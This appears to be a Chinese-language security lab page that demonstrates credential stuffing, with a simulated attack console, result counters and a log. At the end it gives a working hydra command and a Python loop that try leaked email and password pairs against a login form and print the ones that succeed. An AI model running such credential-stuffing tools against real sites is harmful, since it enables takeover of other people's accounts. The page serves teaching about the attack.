← 返回撞库攻击

🎯 实验一:撞库攻击演示

⚠️ 攻击场景

攻击者使用从其他网站泄露的凭证,批量尝试登录目标网站

🎮 攻击控制台

单次尝试

🔴 批量撞库攻击

使用泄露凭证库批量尝试(共 7 条凭证)

📊 攻击结果

0
总尝试
0
撞库成功
0
失败

📜 攻击日志

[等待攻击开始...]

💀 撞库成功的账户

暂无

🛠️ 攻击工具示例

# 使用 hydra 进行撞库
hydra -L emails.txt -P passwords.txt target.com http-post-form \
  "/login:email=^USER^&password=^PASS^:Invalid"

# 使用 Python 脚本
import requests
for email, password in leaked_credentials:
    r = requests.post(url, data={'email': email, 'password': password})
    if 'success' in r.text:
        print(f'[+] Found: {email}:{password}')